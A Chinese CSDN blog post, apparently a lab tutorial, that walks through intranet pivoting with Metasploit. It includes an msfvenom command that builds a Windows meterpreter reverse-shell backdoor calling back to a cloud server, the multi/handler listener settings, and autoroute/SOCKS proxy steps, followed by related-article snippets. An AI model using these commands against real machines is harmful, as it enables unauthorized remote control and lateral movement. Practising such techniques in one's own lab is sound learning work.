内网渗透(一)反向代理实现外网访问到内网

已于 2023-08-02 20:45:37 修改
阅读量1.1k 收藏 14
点赞数 4
分类专栏: 信息安全 文章标签: 网络安全
于 2023-08-02 20:41:24 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_63699746/article/details/132070322
版权

准备工作:

        两台在同一内网的虚拟机(这里是192.168.3.25和3.29,其中25联网),其中一台可以访问外网,云服务器一台作为攻击机,同时作为跳板实现让主机进行连接进行访问其内网。

一、攻击机首先取得一台通外网的一台内网虚拟机(称为a虚拟机)的权限

        攻击机(服务器)使用msf生成后门,放到a虚拟机中,点开与运行上线。

        msfvenom -p windows/meterpreter/reverser_tcp  LHOST=你的云服务器ip  LPORT=3333(端口自定) -f exe > msf.exe ,生成的后门放到a虚拟机中。

上线前需要在服务器上msf开启监听

use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp 
set lhost 0.0.0.0
set lport 3333

 

点击后门文件进行上线。

 上线成功

二、开启节点,开启代理端口(服务器端操作)

开启路由节点:run post/multi/manage/autoroute

 开启代理端口(下面端口1122):

三、主机进行代理,访问其内网。(这里是1133 不用管 填与上面一样的就行)

添加代理规则浏览器软件进行访问

 访问内网

 总结:首先攻击端(服务器)攻击具有内网和外网的虚拟机,取得权限,然后进行对另一台在同一内网的虚拟机进行渗透,通过开启隧道(也就是建立节点),让宿主机连接作为跳板的攻击机,来实现访问另一台内网上的虚拟机。

我猜肯定有人问取得了a主机的权限,也可以和另一台虚拟机进行通讯,那为什么要开隧道。因为这个通讯仅限于在msf中,不能用平时的渗透工具对其另一台的内网进行渗透。所以我们才这样做,实现可以用各种渗透工具进行测试。

一个想一直摆烂的小白
关注
  • 4
    点赞
  • 14
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
NAT反向代理技术的实现外网访问内网
joyousmime的博客
06-27 7105
NAT反向代理技术的实现外网访问内网)(版权所有,引用 请联系作者,注明出处) NAT技术是网络中的重要应用之一。当有一个场景:内网搭建了服务器,需要外网访问时,可以借助NAT映射来实现。如:单位建立了一个Web服务器,我们希望在员工回家之后,依然可以访问到它,那怎么实现呢? 下面的拓扑图,就用来示范这个应用反面场景的实现过程。 一、题目要求: 地址配置如图。使用静态路由: 1、配置右侧交换机2950T,实现单臂路由; 2、配置路由使网络连通; 3、配置NAT访问实现外网对风网服务器的
使用反向ssh从外网访问内网主机的方法详解
09-15
标题中提到的“使用反向SSH从外网访问内网主机的方法详解”是一种解决内网主机对外不可见问题的技术手段,适用于没有权限设置端口映射或不具备内网主机外网IP的情况。这种方法主要通过建立反向SSH隧道,使得外网主机...
利用SSH反向代理实现对局域网内服务器的访问
weixin_42286079的博客
07-26 2907
局域网里有台服务器,在路由器上把某个端口映射到路由器的公网IP上,出差在外时可以通过路由器的公网IP:端口获取局域网服务器的文件。最近不知为何,这招不灵了。通过研究,用SSH的反向代理,通过一台公网服务器中转桥接,实现了对局域网内服务器的访问。 基本信息: 公网服务器A的IP地址是170.77.149.2(这只是举例,真是的IP当然不是这个)。 局域网服务器B的IP地址是192.168.1.8。 配置电脑C是笔记本电脑,暂时使用与B同网段的局域网IP:...
内网渗透-详解代理逻辑及隧道
最新发布
2401_84466225的博客
05-26 1081
红蓝对抗过程中打点以后往往需要进行内网渗透和横向移动,因此大家都需要扎实掌握代理和隧道知识,一款优秀的代理工具也可以给内网渗透带来很大的收益。本期分享,小星将通过简单易懂的方式向大家普及各种代理逻辑及隧道的原理和操作过程。1代理客户端,帮助客户端完成所需请求。举例:小星要向银行贷款,可是因为自己资历不够,所以不获银行放贷,小星个人无法贷到所需款项。此时,只要小星找一个满足资历的A先生去帮忙借贷,银行自然就会放贷。贷款到账后,A先生再私下把钱给到小星。
使用FRP(快速反向代理实现内网穿透——以腾讯云服务器为例
qq_44667259的博客
04-14 7150
FRP(fast reverse proxy,快速反向代理技术),通过frp的部署,可以实现从互联网访问局域网内的某主机,实现内网穿透”。
内网渗透—代理Socks协议、路由不出网、后渗透通讯、CS-MSF控制上线
剁椒鱼头没剁椒的博客
05-18 2079
本章主要涉及到的技术就是如何让攻击机通过能够上网的主机当作跳板去连接内网中不能上网的主机,有点绕口。不过通过介绍页能够大概明白是什么意思。可以看到我下面已经列出了相关的IP地址,这里我就简单介绍一下。攻击机的目标是Windows7系统,而攻击机是无法直接连接Windows7,如果这里不了解我说的是什么意思,请去学习一下路由原理吧!自然而然下面也就不用解释了,肯定是能够连接能够连接能够连接到Windows7。目前攻击机只能够连接,但是我们可以通过采用一些技术而实现和Windows7。
内网穿透、反向代理(ngrok服务器搭建)
热门推荐
xiahailong90的博客
01-19 1万+
内网穿透的目的是:让外网访问你本地的应用,例如在外网打开你本地http://127.0.0.1指向的Web站点。一、ngrokngrok是一个反向代理,通过在公共的端点和本地运行的Web服务器之间建立一个安全的通道。ngrok可捕获和分析所有通道上的流量,便于后期分析与响应。开源免费官网:https://ngrok.com/源码:https://github.com/inconshreveabl
电脑教程无公网IP实现外网访问内网群晖.rar
10-25
标题中的“电脑教程无公网IP实现外网访问内网群晖”主要涉及到的是网络穿透技术,特别是对于家庭或小型办公室用户来说,如何在没有公网IP地址的情况下,远程访问内部网络中的设备,例如群晖NAS(Network Attached ...
agent内网渗透代理相关
04-14
内网渗透代理
frp实现外网访问本地服务
08-24
FRP通过在公网服务器上建立代理,将公网请求转发到内网的指定服务,从而实现外网访问内网资源。例如,如果你在家里运行了一个个人网站或者开发服务器,使用FRP,你可以在任何有网络的地方访问这些本地服务,而无需...
nginx外网访问内网站点配置操作
01-09
背景: 站点是前后端分离:vue+springboot 前端内网地址:192.168.1.10:81 API内网地址:192.168.1.12:8080 外网域名:abc.ab.com 外网IP:10.114.X.X 需求: ...补充知识:用nginx实现反向代理实现
内网安全:代理技术详解
qq_61553520的博客
06-03 8101
本篇将介绍在内网攻防中经常用到的代理技术,正向连接,反向连接。
内网穿透:FRP(Forwarding Remote Proxy)反向代理
原来是肖哈哈的博客
09-04 2394
frp内网穿透教程。FRP是一个可用于内网穿透的高性能的反向代理应用,支持 tcp, udp 协议,为 http 和 https 应用协议提供了额外的能力,且尝试性支持了点对点穿透。
【网络】正向代理和反向代理
小灰狼与大白兔的博客
01-17 8600
关于网络的基本知识: 为什么百度查到的ip和ipconfig查到的不一样;详解公网Ip和私网ip;详解网络分类ABC; 代理 什么是代理?代理其实就相当于交易双方的中间商,当客户端想要与服务端进行“交易”时,代理就需要充当中间商的身份来完成这一次交易。 正向代理和反向代理 正向代理是代理客户端,为客户端收发请求,使真实客户端对服务器不可见; 而反向代理是代理服务器端,为服务器收发请求,使真实服务器对客户端不可见。 从用途上来区分: 正向代理:正向代理用途是为了在防火墙内的局域网提供访问internet的途
使用云服务器和Frp(快速反向代理)框架快速部署实现内网穿透
m0_46339652的博客
07-29 2704
Frp(Fast Reverse Proxy)是一个快速的反向代理工具,它是一款基于Golang语言开发的开源项目,用于将局域网中的内部服务暴露给公网,实现内网穿透的功能。主要特点和用途:1.内网穿透:Frp允许你在内网主机上运行frpc客户端,通过连接到公网上运行的frps服务器,将内网主机的服务暴露到公网上,实现内网穿透,让外部用户可以访问内网的服务。2.简单易用:配置简单,可以通过编辑ini配置文件来指定要暴露的内网服务和端口号等信息。
内网渗透之代理转发
D0126_的博客
04-25 815
正向代理中,Proxy和Client同属一个区域,对Server是透明的;正向代理的是客户端,反向代理的是服务端,可以理解为正向代理是就比如年少时期喜欢那个Ta,当时很羞涩需要我自己(Lhost)写一份信(proxy)去告诉Ta,反向代理就是喜欢的那个Ta(Rhost)知道并且主动(proxy)过来告诉自己(Lhost)。Lhost只向proxy发送普通的请求,具体让他转到哪里,proxy自己判断,然后将返回的数据递交回来,这样的好处就是在某些防火墙只允许proxy数据进出的时候可以有效的进行穿透。
NAS设置内网穿透 | Nginx反向代理 | 外网访问 | 配置华为云服务器
shanbuzaigao_cn的博客
09-21 1589
在日常使用NAS时,相信大家通过外部网络访问NAS也是必备需求。但又苦于没有公网IP,向运营商申请又比较困难,所以在这里分享一个Nginx+Frp的内网穿透解决方案(网上也有很多介绍,这里详细写下个人的配置流程,尽量避免踩坑)
一文拿捏内网穿透利器之frp(反向代理软件相关)
ITSM/ITIL/网络安全/IT运维
10-26 3307
简单地说,frp就是一个反向代理软件, 它的作用是将内网中的服务器暴露到互联网上, 它体积轻量但功能很强大!!!通过它我们可以很方便实现内网穿透功能!!!它其实有两个服务:客户端frpc, 安装在我们内网中某台物理机上服务端frps, 安装在一个公网服务器上如下图:首先公网上先部署了frps服务, 并设置了连接端口然后在内网中运行frpc服务, 启动时会连接到公网上的frpc服务, 并保持保持住这个长连接(如果断开了会进行重试)
内网集群通过nginx代理访问外网
05-01
内网集群通过nginx代理访问外网是一种实现外网服务访问的方法。在实际应用中,由于某些限制,内网集群无法直接访问外网服务,通过nginx代理可以实现内网外网访问。 nginx是一款高性能的开源Web服务器,它可以...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值